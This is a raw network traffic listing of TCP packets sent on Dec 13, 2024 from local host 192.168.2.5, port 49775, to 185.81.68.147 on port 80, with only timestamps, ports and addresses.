Dec 13, 2024 01:37:35.782191038 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782231092 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782231092 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782262087 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782294035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782294035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782327890 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782382965 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782382965 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782382965 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782422066 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782422066 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782461882 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782461882 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782500029 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782500029 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782545090 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782545090 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782563925 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782596111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782596111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782636881 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782636881 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782656908 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782699108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782699108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782735109 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782736063 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782773018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782773018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782809973 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782810926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782843113 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.793796062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.793893099 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.793930054 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.793952942 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794009924 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794011116 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794050932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794050932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794075012 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794109106 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794146061 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794146061 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794172049 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794208050 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794244051 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794244051 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794270992 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794310093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794347048 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794347048 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794378996 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794399023 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794428110 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794446945 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794466019 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794487000 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794514894 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794542074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794569969 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794599056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794627905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794656992 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794672966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794696093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794720888 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794743061 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794783115 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794816017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794816017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794852972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794852972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794902086 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794902086 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794938087 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794972897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794972897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.794998884 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.795046091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.795046091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.795078993 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.795109987 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.795109987 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.795154095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.795154095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.795186996 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.795217991 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809111118 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809149027 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809166908 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809201956 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809221029 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809254885 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809278965 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809305906 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809320927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809349060 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809360981 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809393883 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809407949 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809432983 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809454918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809482098 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809494972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809526920 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809545040 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809570074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809586048 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809617043 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809629917 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809658051 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809673071 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809703112 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809715033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809743881 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809757948 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809802055 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809818029 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809849024 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809868097 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809895992 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809911966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809938908 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809962034 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.809988976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.810003996 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.810029030 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.810074091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.810074091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.810087919 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.810117006 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.810132980 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.810167074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.810182095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.810211897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.810228109 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.810251951 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.810266018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.810293913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817065001 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817092896 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817116976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817141056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817157030 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817183971 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817208052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817250967 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817275047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817293882 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817317009 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817403078 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817461967 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817485094 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817511082 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817526102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817554951 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817570925 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817605972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817624092 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817646980 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817662954 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817689896 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817704916 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817725897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817740917 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817766905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817780018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817806959 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817835093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817848921 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817872047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817890882 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817915916 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817949057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.817962885 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.818205118 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.818238974 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.818476915 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.818490982 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.818515062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.818541050 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.818562984 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.818583965 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.818608046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.818631887 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.818650007 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.818670988 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.818686008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.818711996 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.818734884 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.818758965 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.818783045 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.818805933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.818821907 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.818844080 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.818865061 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.818892956 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.818907976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.818932056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.818962097 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.818978071 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819133043 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819156885 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819185972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819226027 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819241047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819272995 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819293976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819322109 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819333076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819418907 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819434881 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819470882 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819487095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819509983 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819525003 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819547892 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819567919 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819591045 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819611073 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819623947 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819645882 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819689989 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819716930 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819732904 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819772005 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819787979 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819818020 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819842100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819864988 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819889069 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819910049 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819936037 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819960117 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.819984913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820012093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820029974 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820059061 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820096970 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820122957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820142031 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820168972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820190907 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820216894 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820231915 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820260048 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820282936 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820306063 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820334911 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820362091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820386887 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820405006 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820483923 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820514917 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820552111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820578098 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820605040 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820626974 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820652008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820677042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820698977 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820723057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820748091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820775032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820796967 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820820093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820841074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820866108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820889950 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820914030 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820950985 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820966959 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.820986986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821010113 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821029902 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821053028 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821073055 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821096897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821115017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821149111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821166039 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821201086 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821266890 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821296930 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821312904 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821333885 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821372986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821396112 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821427107 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821441889 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821469069 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821499109 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821518898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821543932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821557999 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821588993 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821605921 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821630001 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821652889 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821674109 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821693897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821932077 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821957111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.821985960 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822005033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822031021 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822047949 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822072029 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822098017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822122097 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822141886 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822166920 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822200060 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822200060 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822222948 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822249889 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822267056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822287083 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822324038 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822344065 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822361946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822384119 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822406054 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822432041 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822458982 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822478056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822494984 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822513103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822532892 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822559118 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822594881 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822612047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822632074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822654963 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822695017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822715998 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822731972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822761059 CET	49775	80	192.168.2.5	185.81.68.147
